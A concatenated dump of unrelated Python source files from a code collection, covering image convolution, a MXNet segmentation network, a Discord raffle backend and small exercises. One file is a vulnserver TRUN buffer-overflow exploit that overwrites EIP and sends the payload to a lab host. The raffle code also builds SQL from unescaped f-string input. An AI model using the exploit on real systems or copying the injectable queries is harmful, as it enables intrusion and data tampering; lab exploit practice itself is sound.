# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# name = os.path.join(path, fname)
# f = open(name, 'r+b')
# return f
#
#
# def remove_tmp_file(fname):
# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# os.remove(os.path.join(path, fname))
#
#
# def convert_part1_to_part3(lang):
# try:
# l = iso639.languages.get(part3=lang)
# except KeyError:
# try:
# l = iso639.languages.get(part1=lang)
# except KeyError:
# if lang == 'qcn':
# return 'qcn'
# else:
# return
# return l.part3
#
#
# def convert_part3_to_part1(lang):
# try:
# l = iso639.languages.get(part3=lang)
# except KeyError:
# try:
# l = iso639.languages.get(part1=lang)
# except KeyError:
# return
# language = l.part1
# if language:
# return language
# else:
# return l.part3
#
#
# def convert_name_to_part3(name):
# if name == 'Slovene':
# name = 'Slovenian'
# try:
# l = iso639.languages.get(name=name)
# except KeyError:
# return
# return l.part3
#
# def convert_name_to_part1(name):
# if name == 'Slovene':
# name = 'Slovenian'
# try:
# l = iso639.languages.get(name=name)
# except KeyError:
# return
# return l.part1
re_special = ['?', '(', ')', '<', '>', '[', ']', '$', '^', '.', '|', '*', '+', '{', '}']
def escape(pattern):
s = list(pattern)
for i, c in enumerate(pattern):
if c == "\000":
s[i] = "\\000"
if c in re_special:
s[i] = " \{}".format(c)
return pattern[:0].join(s)
punctuation = set(u' ,,.:;\'\"<>\\/|{}[]`$!&@#%^?*()-_+=-~⟨⟩–—-―‐«»‘’“”·•©¤៛№₳฿₵¢₡₢₠$₫৳₯€ƒ₣₲₴₭ℳ₥₦₧₱₰£₨₪₮₩¥៛®″§™¦。')
delimiters = set(u' ,.:;\'\"<>\\/|{}[]`!@#?*()_+=-–—-―‐~⟨⟩«»‘’“”·•©¤®″™¦®″。')
remove = set(u'«»·•©¤®§™¦៛№®()')
spec = set('\n\t\r\a\b\f\v\0')
isdigit = str.isdigit
def extract_numbers(text):
ret_val = ''
for c in text:
if isdigit(c) or c in ',./-':
ret_val += c
return ret_val
def remove_digits(string):
return ''.join([c for c in string if not isdigit(c)])
def remove_digits_and_delimiters(string):
new_str = ''
for s in string:
if isdigit(s) or s in delimiters:
continue
new_str += s
return new_str
def trim_punkt(word):
if word and '<num>' not in word:
while len(word) > 1 and word[0] in punctuation:
word = word[1:]
while len(word) > 1 and word[-1] in punctuation:
word = word[0:len(word) - 1]
if len(word) == 1 and word[0] in punctuation:
return ''
return word
def get_dir_path(path):
""""""
path = path if os.path.isabs(path) else \
os.path.abspath(
os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(__file__))),
path
)
)
return path
| true |
46f53d5179cd02a324bcf491d71d609d3364205b | Python | CharanyaSudharsanan/Convolution-using-Sobel-Filters | /PA1_100x100filter.py | UTF-8 | 3,816 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 16 10:57:47 2018
@author: dues1
"""
import numpy as np
import cv2
import time
#Random matrices for 1D Convolution
sobelx1 = np.random.rand(101,1)
sobelx2 = np.random.rand(1,101)
sobely1 = np.random.rand(101,1)
sobely2 = np.random.rand(1,101)
#Random matrices for 2D Convolution
arrayx = np.outer(sobelx1,sobelx2) #2D Sobel X filter
arrayy = np.outer(sobely1,sobely2) #2D Sobel Y filter
#import image and convert it into an array
img = cv2.imread('lena_gray.jpg',0)
#print(img.shape)
#display input grayscale image
cv2.namedWindow('Input Image', cv2.WINDOW_NORMAL)
cv2.imshow('Input Image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
sobelx_output_1D = np.zeros_like(img) #Gx
sobely_output_1D = np.zeros_like(img) #Gy
sobelxy_output_1D = np.zeros_like(img) #G
sobelx_output_2D = np.zeros_like(img) #Gx
sobely_output_2D = np.zeros_like(img) #Gy
sobelxy_output_2D = np.zeros_like(img) #G
#reference : https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.pad.html
def pad_with(vector, pad_width, iaxis, kwargs):
vector[:pad_width[0]] = 0
vector[-pad_width[1]:] = 0
return vector
img = np.pad(img, 50 , pad_with)
#print(img.shape)
#print(img)
row = img.shape[0]
col = img.shape[1]
st = time.clock()
#2D Convolution
for x in range(51,row-51):
for y in range(51,col-51):
sobx = ((np.outer(sobelx2,sobelx1))*img[x-51:x-51+101,y-51:y-51+101]).sum()
sobelx_output_2D[x-51,y-51] = sobx
soby = ((np.outer(sobely2,sobely1))*img[x-51:x-51+101,y-51:y-51+101]).sum()
sobely_output_2D[x-51,y-51] = soby
sobxy = np.sqrt(sobx * sobx + soby * soby)
sobelxy_output_2D[x-51,y-51] = sobxy
end = time.clock()
tt = end - st
print('Time taken for 2D Convolution :', tt)
#print('sobelx_2D:',sobelx_output_2D)
#print(sobelx_output_2D.shape)
cv2.imshow('sobelx_2D image',sobelx_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
#
#print('sobely_2D:',sobely_output_2D)
#print(sobely_output_2D.shape)
cv2.imshow('sobely_2D image',sobely_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
#print('sobelxy_2D',sobelxy_output_2D)
#print(sobelxy_output_2D.shape)
cv2.imshow('sobelxy_2D image', sobelxy_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
#1D Convolution
st1 = time.clock()
interx = np.zeros((512,512))
intery = np.zeros((512,512))
#since we've padded 50 zeros all edges
for x in range(51,row-51):
for y in range(51,col-51):
sobx = np.sum(np.multiply(sobelx1[0:101,0],img[x-51:x-51+101,y]))
interx[x-51,y-51] = sobx
soby = np.sum(np.multiply(sobely1[0:101,0],img[x-51:x-51+101,y]))
intery[x-51,y-51] = soby
interx = np.pad(interx, 50 , pad_with)
intery = np.pad(intery, 50 , pad_with)
for x in range(51,interx.shape[0]-51):
for y in range(51,interx.shape[1]-51):
sobx = np.sum(np.multiply(sobelx2[0,0:101],interx[x,y-51:y-51+101]))
sobelx_output_1D[x-51,y-51] = sobx
soby = np.sum(np.multiply(sobely2[0,0:101],intery[x,y-51:y-51+101]))
sobely_output_1D[x-51,y-51] = soby
sobxy = np.sqrt(sobx * sobx + soby * soby)
sobelxy_output_1D[x-51,y-51] = sobxy
end1 = time.clock()
tt1 = end1 - st1
print('Time taken for 1D Convolution :', tt1)
#print('sobelx_1D:',sobelx_output_1D)
#print(sobelx_output_1D.shape)
cv2.imshow('sobelx image',sobelx_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
#print('sobely_1D:',sobely_output_1D)
#print(sobely_output_1D.shape)
cv2.imshow('sobely image',sobely_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
#print('sobelxy_1D:',sobelxy_output_1D)
#print(sobelxy_output_1D.shape)
cv2.imshow('sobelxy image',sobelxy_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
| true |
4620158a0f98916fb6882eedbc7014fe654f9a64 | Python | gallowag/galloway-cs450 | /prove01.py | UTF-8 | 2,834 | 3.796875 | 4 | [] | no_license | from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
#step 1
def load_data():
iris = datasets.load_iris()
return iris
#step 2
def prepare_training_and_test_sets():
data_train, data_test, targets_train, targets_test = train_test_split(iris.data, iris.target, test_size=0.30)
return data_train, data_test, targets_train, targets_test
#step 3
def use_existing_algorithm_to_create_a_model(data_train, targets_train):
classifier = GaussianNB()
model = classifier.fit(data_train, targets_train)
return model
#calculate accuracy
def calculate_accuracy(list1, list2):
count = 0
length = len(list1)
for i, j in zip(list1, list2):
if(i == j):
count += 1
percent_accuracy = (count / length) * 100
print("Achieved " + str(count) + "\\" + str(length) + " or " + str(percent_accuracy) + "% accuracy")
#step 4
def use_that_model_to_make_predictions(model, data_test, targets_test):
targets_predicted = model.predict(data_test)
print("Naive Bayes algorithm: ")
calculate_accuracy(targets_predicted, targets_test)
return targets_predicted
#class defintion - HardCodedModel
class HardCodedModel:
def __init__(self):
pass
def predict(self, data_test):
# Initialize empty targets
targets = []
# Fill targets with 0's
for i in data_test:
targets.append(0)
return targets
#class defintion - HardCodedClassifier
class HardCodedClassifier:
def __init__(self):
pass
def fit(self, data_train, targets_train):
hard_coded_model = HardCodedModel()
return hard_coded_model
#step 5
def implement_your_own_new_algorithm(data_train, data_test, targets_train, targets_test):
classifier = HardCodedClassifier()
model = classifier.fit(data_train, targets_train)
targets_predicted = model.predict(data_test)
print("Hard-coded algorithm: ")
calculate_accuracy(targets_predicted, targets_test)
return targets_predicted
#main
def main():
# Call steps 1 and 2
iris = load_data
training_and_test_sets = prepare_training_and_test_sets()
# Seperate list
data_train = training_and_test_sets[0]
data_test = training_and_test_sets[1]
targets_train = training_and_test_sets[2]
targets_test = training_and_test_sets[3]
# Call steps 3-5
model = use_existing_algorithm_to_create_a_model(data_train, targets_train)
targets_predicted = use_that_model_to_make_predictions(model, data_test, targets_test)
my_targets_predicted = implement_your_own_new_algorithm(data_train, data_test, targets_train, targets_test)
#call main
if __name__ == "__main__":
main()
| true |
a29a43b89e5b498f7011a4507401ea06f7ab0c42 | Python | thebluetoob/ctf-notes-public | /bufferoverflow/vulnserver-trun/5-esp-confirm.py | UTF-8 | 475 | 2.59375 | 3 | [] | no_license | #!/usr/bin/python
import socket
#[*] Exact match at offset 2006
buffer = "A" * 2006
# eip = "B" * 4
# 625011AF
eip = "\xAF\x11\x50\x62"
remaining = "DEFGHIJKLMNOPQRS" + "C" * (3000 - len(buffer) - len(eip) - 16)
payload = buffer + eip + remaining
print("Throwing evil payload of size %s at TRUN option" % len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.11.20.27",9999))
s.recv(1024)
s.send("TRUN ." + payload)
s.recv(1024)
s.close() | true |
51575c9f1f69bd316c21438907b6ca419fefc2a7 | Python | Joshawikkit13/Python-Project | /Week 5/Project2-Crow.py | UTF-8 | 457 | 4.15625 | 4 | [] | no_license | side1 = float(input("Please enter side 1 (not the hypotenuse) of the triangle."))
side2 = float(input("Please enter side 2 (also not the hypotenuse) of the triangle."))
side3 = float(input("Please enter the hypotenuse of the triangle."))
if((side1 * side1) + (side2 *side2) == (side3 * side3)):
print("Congratulations, you have a right triangle!")
else:
print("Sorry, this is not a right triangle.")
input("Press any key, then press enter to exit.") | true |
df843c59393ba2634a0ee6ccf5fd4c87407f1707 | Python | Nate314/CS470GroupProject | /service/endpoints/RaffleRepository.py | UTF-8 | 11,926 | 2.625 | 3 | [] | no_license | import datetime
import random
from helpers import Database
from helpers import StatusCodes
from .CommonRepository import CommonRepository
# Repositories retrieve data from the database
class RaffleRepository:
# initialize RaffleRepository
def __init__(self):
self.db = Database()
self._commonRepository = CommonRepository()
# returns JSON representing all of the users participating in this raffle
def __get_discordusers_in_raffle(self, raffleID):
return eval(str(self.db.select([
'discordusers.DiscordUserID', 'discordusers.UserName', 'discordusers.Currency',
'discordusers.UserHash', 'resources.Link AS ProfilePicture'],
'''discorduserraffles
LEFT OUTER JOIN discordusers ON discordusers.DiscordUserID = discorduserraffles.DiscordUserID
LEFT OUTER JOIN resources ON resources.ResourceID = discordusers.ResourceID''',
f"discorduserraffles.RaffleID = '{raffleID}'")))
# starts a new raffle
def start_raffle(self, rName, rDiscordUserID, rServerID, rDuration, rSeedAmount):
try:
userCurrenyQuery = self.db.select(['Currency'], 'discordusers',
f"DiscordUserID = '{rDiscordUserID}'").getRows()
if len(userCurrenyQuery) > 0:
userCurrency = userCurrenyQuery[0]['Currency']
# make sure the user has enough currency to start this raffle
if userCurrency >= rSeedAmount:
endTime = None
# calculate end datetime of this raffle
if rDuration >= 0:
nowtime = datetime.datetime.now().timestamp()
endTime = str(datetime.datetime.fromtimestamp(int(nowtime + (rDuration / 1000))))
# create raffle in Raffles table
if self.db.insertOne('raffles', ['ServerID', 'Name', 'EndTime', 'Currency', 'DiscordUserID'], {
'ServerID': rServerID,
'Name': rName,
'EndTime': endTime,
'Currency': rSeedAmount,
'DiscordUserID': rDiscordUserID
}):
# get the new RaffleID
maxID = self.db.select(['MAX(RaffleID) AS NewID'], 'raffles').getRows()
newRaffleID = 1
if (len(maxID) > 0):
newRaffleID = maxID[0]['NewID']
# insert into DiscordUserRaffles table
self.db.insertOne('discorduserraffles', ['DiscordUserID', 'RaffleID', 'JoinDate'], {
'DiscordUserID': rDiscordUserID,
'RaffleID': newRaffleID,
'JoinDate': str(datetime.datetime.now())
})
# decrement the user's currency
self._commonRepository.subtract_from_user_currency(rDiscordUserID, rSeedAmount)
# return OK
return '', StatusCodes.OK
else:
# conflict when inserting, so a raffle with this name already exists
return f"A raffle with the name {rName} already exists on this server", StatusCodes.CONFLICT
# the user does not have enough currency to start this raffle
return 'Insufficient funds', StatusCodes.IM_A_TEAPOT
except:
# some error has occurred
return '', StatusCodes.INTERNAL_SERVER_ERROR
# adds currency to a raffle
def join_raffle(self, rDiscordUserID, rServerID, rRaffle, rAmount):
try:
userCurrenyQuery = self.db.select(['Currency'], 'discordusers',
f"DiscordUserID = '{rDiscordUserID}'").getRows()
if len(userCurrenyQuery) > 0:
userCurrency = userCurrenyQuery[0]['Currency']
# make sure the user has enough currency to start this raffle
if userCurrency >= rAmount:
# if a raffle exists on this server with the same name
raffleQueryDataTable = self.db.select(['RaffleID', 'Currency'], 'raffles',
f"Name = '{rRaffle}' AND ServerID = '{rServerID}'")
print(str(raffleQueryDataTable))
raffleQueryDataTable = raffleQueryDataTable.getRows()
if len(raffleQueryDataTable) == 1:
# get the RaffleID
raffleID = raffleQueryDataTable[0]['RaffleID']
currentCurrency = raffleQueryDataTable[0]['Currency']
# insert into DiscordUserRaffles table
self.db.insertOne('discorduserraffles', ['DiscordUserID', 'RaffleID', 'JoinDate'], {
'DiscordUserID': rDiscordUserID,
'RaffleID': raffleID,
'JoinDate': str(datetime.datetime.now())
})
# update the Raffles table
self._commonRepository.add_currency_to_raffle(raffleID, rAmount)
# decrement the user's currency
self._commonRepository.subtract_from_user_currency(rDiscordUserID, rAmount)
# query the DB for the return statement
raffle = eval(str(self.db.select(['*'], 'raffles', f"RaffleID = '{raffleID}'").getRows()[0]))
discordusers = self.__get_discordusers_in_raffle(raffleID)
# return OK
return {
'DiscordUsers': discordusers,
'Raffle': raffle
}, StatusCodes.OK
else:
# raffle with the passed name was not found on the server
return f"A raffle with the name {rRaffle} was not found on this server",\
StatusCodes.NOT_FOUND
# the user does not have enough currency to start this raffle
return 'Insufficient funds', StatusCodes.IM_A_TEAPOT
except:
# some error has occurred
return '', StatusCodes.INTERNAL_SERVER_ERROR
# returns all of the raffles that are currently available on the specified server
def get_raffles(self, rServerID):
try:
raffles = self.db.select(['*'], 'raffles', f"ServerID = '{rServerID}'").getRows()
# return list of raffleinfos
return [{
'DiscordUsers': self.__get_discordusers_in_raffle(raffle['RaffleID']),
'Raffle': eval(str(raffle))
} for raffle in raffles], StatusCodes.OK
except:
# some error has occurred
return '', StatusCodes.INTERNAL_SERVER_ERROR
# returns all of the raffles that are currently available on the specified server
def get_historic_raffles(self, rDiscordUserID):
try:
result = self.db.select(['discorduserraffles.RaffleID',
'CASE WHEN rafflehistory.DiscordUserID IS NOT NULL THEN rafflehistory.DiscordUserID ELSE raffles.DiscordUserID END AS DiscordUserID',
'CASE WHEN rafflehistory.ServerID IS NOT NULL THEN rafflehistory.ServerID ELSE raffles.ServerID END AS ServerID',
'CASE WHEN rafflehistory.Name IS NOT NULL THEN rafflehistory.Name ELSE raffles.Name END AS Name',
'CASE WHEN rafflehistory.EndTime IS NOT NULL THEN rafflehistory.EndTime ELSE raffles.EndTime END AS EndTime',
'CASE WHEN rafflehistory.Currency IS NOT NULL THEN rafflehistory.Currency ELSE raffles.Currency END AS Currency',
'rafflehistory.WinnerDiscordUserID'], '''
discorduserraffles
LEFT JOIN rafflehistory ON discorduserraffles.RaffleID = rafflehistory.RaffleID
LEFT JOIN raffles ON discorduserraffles.RaffleID = raffles.RaffleID''',
'discorduserraffles.DiscordUserID = %s AND (raffles.DiscordUserID IS NOT NULL OR rafflehistory.DiscordUserID IS NOT NULL)', [rDiscordUserID])
# return list of raffleinfos
return eval(str(result)), StatusCodes.OK
except:
# some error has occurred
return '', StatusCodes.INTERNAL_SERVER_ERROR
# returns all of the raffles that are going to end within the given number of milliseconds
def get_raffles_ending_in_millis(self, rMillis):
try:
# calculate time
nowtime = datetime.datetime.now().timestamp()
endTime = str(datetime.datetime.fromtimestamp(int(nowtime + (rMillis / 1000))))
# query Raffles table
raffles = self.db.select(['*'], 'raffles', f"EndTime < '{endTime}'")
# return list of raffles
return eval(str(raffles)), StatusCodes.OK
except:
# some error has occurred
return '', StatusCodes.INTERNAL_SERVER_ERROR
# ends the specified raffle if the user who
# requested this is qualified to end the raffle
def end_raffle(self, rDiscordUserID, rServerID, rRaffle):
try:
print('end_raffle')
raffle = self.db.select(['*'], 'raffles',\
f"ServerID = '{rServerID}' AND Name = '{rRaffle}'").getRows()
if len(raffle) == 1:
# if the user who is ending this raffle is the bot or
# is the user who started this raffle
if rDiscordUserID in ['0', raffle[0]['DiscordUserID']]:
discordusersinraffle = self.__get_discordusers_in_raffle(raffle[0]['RaffleID'])
winner = random.choice(discordusersinraffle)
# add the total currency for this raffle to the winner's currency
self._commonRepository.add_to_user_currency(winner['DiscordUserID'], raffle[0]['Currency'])
nowtime = datetime.datetime.now().timestamp()
endTime = datetime.datetime.fromtimestamp(int(nowtime))
self.db.insertOne('rafflehistory', ['RaffleID', 'ServerID', 'Name', 'EndTime', 'Currency', 'DiscordUserID', 'WinnerDiscordUserID'], {
'RaffleID': raffle[0]['RaffleID'],
'ServerID': raffle[0]['ServerID'],
'Name': raffle[0]['Name'],
'EndTime': str(endTime),
'Currency': raffle[0]['Currency'],
'DiscordUserID': raffle[0]['DiscordUserID'],
'WinnerDiscordUserID': winner['DiscordUserID']
})
print('before delete')
# delete the raffle
self.db.delete('raffles', 'RaffleID = %s', [raffle[0]['RaffleID']])
print('after delete')
return {
'Winner': winner,
'RaffleInfo': {
'DiscordUsers': discordusersinraffle,
'Raffle': eval(str(raffle[0]))
}
}, StatusCodes.OK
else:
# only the user who started the raffle or the bot can end a raffle
return 'You do not have the authority to end this raffle',\
StatusCodes.FORBIDDEN
else:
# raffle with the passed name was not found on the server
return f"A raffle with the name {rRaffle} was not found on this server",\
StatusCodes.NOT_FOUND
except Exception as e:
# some error has occurred
return e, StatusCodes.INTERNAL_SERVER_ERROR
| true |
2c048c8bfb008583f3c5defe19350ec65dc6eeef | Python | amritat123/list_Questions | /add_withthird_element.py | UTF-8 | 123 | 3.53125 | 4 | [] | no_license | #addition with first element to third element..
a=[15,7,9,8,2,6]
i=0
j=1
while i<len(a)-2:
print(a[i]+a[j]+2)
i+=1
j+=1 | true |
bc7093513abd8b955ebaa12c6118274e86d00cf2 | Python | lachinov/brats2018-graphlabunn | /scripts/segmentation_model.py | UTF-8 | 11,803 | 2.84375 | 3 | [
"Apache-2.0"
] | permissive | import mxnet as mx
import config
import utils
def dice_loss(softmax, label, smooth=1.0, name='', include_bg=False):
"""
mean Dice loss function
:param softmax: input softmax tensor with shape (N,C,D,H,W)
:param label: input label tensor with shape (N,C,D,H,W)
:param smooth: smoothing constant for Laplace smoothing
:param name: network name
:param include_bg: whether to include background in loss computation or not
"""
pred_size = mx.sym.square(softmax).sum(axis=[2, 3, 4])
label_size = label.sum(axis=[2, 3, 4])
intersection_size = (softmax * label).sum(axis=[2, 3, 4])
error = (2.0 * intersection_size+smooth) / (pred_size + label_size + smooth)
if not include_bg:
error = mx.sym.slice_axis(error, axis=1, begin=1, end=None)
error = error.mean()
return mx.symbol.MakeLoss(1.0 - error, name=name+'smooth_dice')
def conv(data, kernel, pad, stride, num_filter, net_name, name, num_group):
"""
convolution wrapper
:param data: input tensor with shape (N,C,D,H,W)
:param kernel: shape of the convolving kernel (X,Y,Z)
:param pad: padding (X,Y,Z)
:param stride: convolution stride (X,Y,Z)
:param num_filter: number of filters
:param net_name: name of the network
:param name: name of the filter
:param num_group: number of convolutional groups
"""
return mx.sym.Convolution(data=data, kernel=kernel, pad=pad, stride=stride, num_filter=num_filter, num_group=num_group,
name=net_name + name + 'sep_conv')
def activation(data, type, name):
"""
activation function wrapper
:param data: input tensor with shape (N,C,D,H,W)
:param type: one of ['relu','lrelu','prelu','elu','softplus']
:param name: activation layer name
"""
assert(type in ['relu','lrelu','prelu','elu','softplus'])
act = mx.sym.Activation(data=data, act_type='relu', name=name)
if type == 'lrelu':
act = mx.sym.LeakyReLU(data=data, act_type='leaky', slope=config.slope, name=name)
elif type == 'prelu':
act = mx.sym.LeakyReLU(data=data, act_type='prelu', slope=config.slope,name=name)
elif type == 'elu':
act = mx.sym.LeakyReLU(data=data, act_type='elu', slope=config.slope, name=name)
elif type=='softplus':
act = mx.sym.Activation(data=data, act_type='softrelu', name=name)
return act
def res_net_pre_activation(data, num_filter, net_name, name, normalize=True, num_group=1):
"""
pre-activation residual block
:param data: input tensor with shape (N,C,D,H,W)
:param num_filter: number of filters
:param net_name: name of the network
:param name: name of the residiual block
:param normalize: normalize feature maps or not
:param num_group: number of groups in convolutions
"""
norm_data = data
if normalize:
norm_data = mx.sym.InstanceNorm(data, name = net_name+name+'norm1')
relu1 = activation(data=norm_data, type=config.activation, name=name + 'relu1')
conv1 = conv(data=relu1, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=num_filter, num_group=num_group, net_name=net_name, name=name + 'conv1')
if normalize:
conv1 = mx.sym.InstanceNorm(conv1, name = net_name+name+'norm2')
relu2 = activation(data=conv1, type=config.activation, name=name + 'relu2')
conv2 = conv(data=relu2, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=num_filter, num_group=num_group, net_name = net_name, name=name + 'conv2')
s = mx.sym.elemwise_add(data,conv2,name=name+'sum')
return s
def transform_encoders_feature_map(feature_maps):
"""
transformation of multiple encoders outputs
:param feature_maps: concatenated encoders' feature maps
:return joint feature map
"""
maps = mx.sym.split(feature_maps,axis=1, num_outputs=config.encoder_groups)
new_stack = mx.sym.stack(*maps,axis=5)
return mx.sym.max_axis(new_stack,axis=5)
def get_unet_symbol(data, features_number, outputs_number, net_name, stack_conn_0, stack_conn_1, stack_conn_2, return_feature_map = False):
"""
get base network symbol
:param data: input tensor with shape (N,C,D,H,W)
:param features_number: base number of filters (features)
:param outputs_number: number of output classes
:param net_name: name of the network
:param stack_conn_0, stack_conn_1, stack_conn_2: connections with cascaded networks (None or corresponding symbol)
:param return_feature_map: return softmax or softmax with feature maps from deeper layers of network
:param training: produce symbol for training or testing phase
:return symbol
"""
conv1 = conv(data=data, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=features_number * 2 * config.encoder_channel_multiplier,
num_group=config.encoder_groups, net_name=net_name, name='conv1')
rb1 = res_net_pre_activation(conv1, features_number * 2 * config.encoder_channel_multiplier, net_name, 'rb1', True, config.encoder_groups)
pool1 = mx.sym.Convolution(data=rb1, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 4 * config.encoder_channel_multiplier,
num_group=config.encoder_groups , name=net_name + 'pool1')
block_0 = mx.sym.Dropout(pool1, p=0.1, name=net_name + 'do1')
rb2 = res_net_pre_activation(block_0, features_number * 4 * config.encoder_channel_multiplier, net_name, 'rb2', True, config.encoder_groups)
pool2 = mx.sym.Convolution(data=rb2, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 8 * config.encoder_channel_multiplier,
num_group=config.encoder_groups, name=net_name + 'pool2')
block_1 = mx.sym.Dropout(pool2, p=0.1, name=net_name + 'do2')
rb3 = res_net_pre_activation(block_1, features_number * 8 * config.encoder_channel_multiplier, net_name, 'rb3', True, config.encoder_groups)
pool3 = mx.sym.Convolution(data=rb3, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 16 * config.encoder_channel_multiplier,
num_group=config.encoder_groups, name=net_name + 'pool3')
block_2 = mx.sym.Dropout(pool3, p=0.1, name=net_name + 'do3')
rb4 = res_net_pre_activation(block_2, features_number * 16 * config.encoder_channel_multiplier, net_name, 'rb4', True, config.encoder_groups)
rb4 = transform_encoders_feature_map(rb4)
up_conv4_1 = mx.sym.Deconvolution(rb4, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
num_filter=features_number * 8, name=net_name + 'up_conv4_1')
rb3 = transform_encoders_feature_map(rb3)
connection0 = mx.symbol.concat(up_conv4_1, rb3, dim=1)
if stack_conn_0 is not None:
connection0 = mx.symbol.concat(up_conv4_1, rb3, stack_conn_0, dim=1, name=net_name+'sconc0')
connection0 = mx.sym.Convolution(data=connection0, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 8)
rb5 = res_net_pre_activation(connection0, features_number * 8, net_name, 'rb5', True)
up_conv3_1 = mx.sym.Deconvolution(rb5, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
num_filter=features_number * 4, name=net_name + 'up_conv3_1')
rb2 = transform_encoders_feature_map(rb2)
connection1 = mx.symbol.concat(up_conv3_1, rb2, dim=1)
if stack_conn_1 is not None:
connection1 = mx.symbol.concat(up_conv3_1, rb2, stack_conn_1, dim=1, name=net_name+'sconc1')
connection1 = mx.sym.Convolution(data=connection1, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 4)
rb6 = res_net_pre_activation(connection1, features_number * 4, net_name, 'rb6', True)
up_conv2_1 = mx.sym.Deconvolution(rb6, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
num_filter=features_number * 2, name=net_name + 'up_conv2_1')
rb1 = transform_encoders_feature_map(rb1)
connection2 = mx.symbol.concat(up_conv2_1, rb1, dim=1)
if stack_conn_2 is not None:
connection2 = mx.symbol.concat(up_conv2_1, rb1, mx.sym.BlockGrad(stack_conn_2), dim=1, name=net_name+'sconc2')
connection2 = mx.sym.Convolution(data=connection2, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 2)
rb7 = res_net_pre_activation(connection2, features_number * 2, net_name, 'rb7', True)
fconv3 = mx.sym.Convolution(data=rb7, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=outputs_number)
#if stack_conn_2 is not None:
# fconv3 = mx.symbol.elemwise_add(fconv3, stack_conn_2, dim=1, name=net_name+'fconn')
if return_feature_map:
return fconv3, rb7
return fconv3
def softmax(net, label):
"""
apply softmax and loss to the inputs
:param net: network output tensor with shape (N,C,D,H,W)
:param label: ground truth tensor with shape (N,C,D,H,W)
:return symbol, loss
"""
softmax = mx.sym.softmax(data=net, name='softmax_lbl', axis=1)
loss_dice = dice_loss(softmax, label, 1.0, 'seg')
return softmax, loss_dice
def get_segmentation_model(data, label, filters_number=config.seg_filters_number, n_outputs = config.seg_output_features, name_prefix = '', training=True):
"""
get segmentation model symbol and corresponding loss
:param data: input tensor with shape (N,C,D,H,W)
:param label: ground truth tensor with shape (N,C,D,H,W)
:param filters_number: base number of filters
:param n_outputs: number of output classes
:param name_prefix: model prefix
:return symbol, loss
"""
data128 = data
data64 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(2,2,2), stride=(2,2,2))
data32 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(4,4,4), stride=(4,4,4))
data16 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(8,8,8), stride=(8,8,8))
label128 = label
label64 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(2,2,2), stride=(2,2,2))
label32 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(4,4,4), stride=(4,4,4))
label16 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(8,8,8), stride=(8,8,8))
#net16, fm16 = get_unet_symbol(data = data16, features_number=filters_number * 8, outputs_number=n_outputs, net_name=name_prefix + 'net16',
# stack_conn_0=None, stack_conn_1=None, stack_conn_2=None, return_feature_map=True, training=True)
#net16_sm, loss_dice16 = softmax(net16, label16)
net32, fm32 = get_unet_symbol(data=data32, features_number=filters_number * 4, outputs_number=n_outputs,
net_name=name_prefix + 'net32',
stack_conn_0=None, stack_conn_1=None, stack_conn_2=None, return_feature_map=True)
net32_sm, loss_dice32 = softmax(net32, label32)
net64, fm64 = get_unet_symbol(data=data64, features_number=filters_number * 2, outputs_number=n_outputs,
net_name=name_prefix + 'net64',
stack_conn_0=None, stack_conn_1=net32_sm, stack_conn_2=None, return_feature_map=True)
net64_sm, loss_dice64 = softmax(net64, label64)
net128 = get_unet_symbol(data=data, features_number=filters_number, outputs_number=n_outputs,
net_name=name_prefix + 'net128',
stack_conn_0=net32_sm, stack_conn_1=net64_sm, stack_conn_2=None, return_feature_map=False)
net128_sm, loss_dice128 = softmax(net128, label128)
loss = 0.4*loss_dice128+0.3*loss_dice64+0.2*loss_dice32#+0.1*loss_dice16
if not training:
return mx.sym.BlockGrad(net128_sm), None
return mx.sym.BlockGrad(net128_sm), loss | true |
3c04f4fa7eccefddd59c7b4ab3f37479647a147f | Python | DocIncognito/gameDesign_up | /0. Dr. Marc's Pygame Tutorial/tutorial.py | UTF-8 | 5,758 | 3.34375 | 3 | [] | no_license | import pygame, sys
class Map(object):
def __init__(self):
"""initializes the map"""
self.data = open("map.txt").readlines()
self.data = [line.rstrip() for line in self.data]
self.water = pygame.image.load("gfx/water.png").convert()
self.land = pygame.image.load("gfx/land.png").convert()
def draw(self, screen):
"""draws the map"""
for i, row in enumerate(self.data):
for j, column in enumerate(row):
if column == "l":
#draw the land tile
screen.blit(self.land, pygame.Rect(j*64, i*64, 64, 64))
elif column == "w":
screen.blit(self.water, pygame.Rect(j*64, i*64, 64, 64))
class Ball(object):
